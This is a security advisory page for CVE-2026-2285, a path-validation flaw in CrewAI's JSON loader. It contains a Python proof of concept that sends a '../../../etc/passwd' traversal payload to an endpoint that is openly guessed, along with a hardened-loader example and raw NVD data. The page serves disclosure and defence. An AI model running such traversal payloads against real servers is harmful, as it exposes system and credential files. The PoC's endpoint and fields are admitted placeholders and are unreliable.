Security Vulnerability Report
CVE-2026-2285 CVSS 7.5 HIGH

CVE-2026-2285

Published: 2026-03-30 16:16:05
Last Modified: 2026-04-15 13:37:27

Description

CrewAI contains an arbitrary local file read vulnerability in the JSON loader tool: the tool reads whatever path it is given without validating it, so a caller can read files elsewhere on the server.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:crewai:crewai:1.0.0:*:*:*:*:*:*:* - VULNERABLE
CrewAI (the exact affected version range is not disclosed in the available information; the CPE entry above names only 1.0.0)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-2285 (CrewAI Arbitrary Local File Read)
# This script demonstrates how a lack of path validation can lead to file reading.
#
# Caveat: the advisory does not document an HTTP endpoint, a parameter name or
# an "action" field. The URL path and the payload keys below are placeholders
# that must be adapted to how the target actually exposes the JSON loader tool.
import requests


def exploit_crewai_lfi(target_url, malicious_path):
    """
    Exploit the JSON loader tool to read arbitrary files.
    :param target_url: The URL of the CrewAI instance endpoint
    :param malicious_path: The path to the file on the server (e.g., '../../../etc/passwd')
    """
    # Assuming the vulnerable endpoint accepts a 'file_path' parameter in a JSON body
    payload = {
        "file_path": malicious_path,
        "action": "load_json",
    }
    try:
        # Send the malicious request; a timeout keeps the script from hanging
        response = requests.post(target_url, json=payload, timeout=10)
        if response.status_code == 200:
            print("[+] Success! File content retrieved:")
            print(response.text)
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print(response.text)
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    # Example usage (placeholder endpoint, see caveat above)
    target = "http://localhost:8000/api/load-json"
    # Path traversal payload to read /etc/passwd on Linux
    file_to_read = "../../../etc/passwd"
    print(f"[*] Attempting to read {file_to_read} from {target}...")
    exploit_crewai_lfi(target, file_to_read)
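The vulnerable pattern the advisory describes, and the fix a maintainer would apply, as an added example written for this page (it is not CrewAI's code and does not reproduce the affected tool's API): a loader that opens whatever path it is handed, next to one that canonicalises the path and refuses anything outside an allow-listed base directory. The directory layout, file names and file contents are constructed inline so the script runs offline.

```python
# Added example (not CrewAI's code): a minimal JSON loader in the shape the
# advisory describes (reads whatever path it is given) next to a hardened
# version that confines reads to an allow-listed base directory.
import json
import os
import shutil
import tempfile


def load_json_unvalidated(path: str) -> object:
    """Vulnerable pattern: the path comes from the caller (ultimately from an
    LLM tool call or an API request) and is opened as-is. '../' sequences,
    absolute paths and symlinks all resolve outside any intended directory."""
    with open(path, "r", encoding="utf-8") as fh:
        return json.load(fh)


def resolve_within(base_dir: str, requested: str) -> str:
    """Resolve `requested` relative to `base_dir` and refuse anything that
    escapes it. realpath() follows symlinks, so a link planted inside the
    base directory cannot be used to read outside it either. An absolute
    `requested` makes os.path.join discard base_dir, and is caught the same way."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    # commonpath rather than startswith(): "/data" must not accept "/data2/x"
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes base directory: {requested!r}")
    return candidate


def load_json_confined(base_dir: str, requested: str) -> object:
    """Hardened loader: only files under base_dir, and only .json files."""
    resolved = resolve_within(base_dir, requested)
    if not resolved.endswith(".json"):
        raise ValueError(f"not a JSON file: {requested!r}")
    with open(resolved, "r", encoding="utf-8") as fh:
        return json.load(fh)


def demo() -> dict:
    """Constructed sandbox: a 'data' dir holding one legitimate JSON file, and
    a 'secret.json' one level up standing in for a file the tool must not read."""
    root = tempfile.mkdtemp(prefix="json-loader-demo-")
    try:
        data_dir = os.path.join(root, "data")
        os.makedirs(data_dir)
        with open(os.path.join(data_dir, "config.json"), "w", encoding="utf-8") as fh:
            json.dump({"agent": "researcher"}, fh)
        with open(os.path.join(root, "secret.json"), "w", encoding="utf-8") as fh:
            json.dump({"api_key": "constructed-secret"}, fh)

        results = {"rejected": []}
        # Legitimate request: a file inside the allowed directory.
        results["legit"] = load_json_confined(data_dir, "config.json")
        # The vulnerable loader follows the traversal straight out of data_dir.
        results["unvalidated_leak"] = load_json_unvalidated(
            os.path.join(data_dir, "../secret.json"))
        # The hardened loader rejects the same traversal and an absolute path.
        for attempt in ("../secret.json", os.path.join(root, "secret.json")):
            try:
                load_json_confined(data_dir, attempt)
                results["rejected"].append(("ALLOWED", attempt))
            except ValueError:
                results["rejected"].append(("REJECTED", attempt))
        return results
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The containment check is the whole fix: canonicalise with `os.path.realpath` before comparing, and compare with `os.path.commonpath` rather than a string prefix, otherwise `/data` would accept `/data2/...`. Whitelisting the file extension is a second, cheaper layer that stops the tool from being used as a generic file reader even for paths that happen to be inside the base directory.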

References

https://www.kb.cert.org/vuls/id/221883 (Third Party Advisory, VDB Entry)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2285", "sourceIdentifier": "[email protected]", "published": "2026-03-30T16:16:04.670", "lastModified": "2026-04-15T13:37:26.773", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CrewAI contains a arbitrary local file read vulnerability in the JSON loader tool that reads files without path validation, enabling access to files on the server."}, {"lang": "es", "value": "CrewAI contiene una vulnerabilidad de lectura arbitraria de archivos locales en la herramienta de carga JSON que lee archivos sin validación de ruta, permitiendo el acceso a archivos en el servidor."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:crewai:crewai:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "3DC9BCCB-78E5-4D50-9EAD-6F54EB4E3153"}]}]}], "references": [{"url": "https://www.kb.cert.org/vuls/id/221883", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}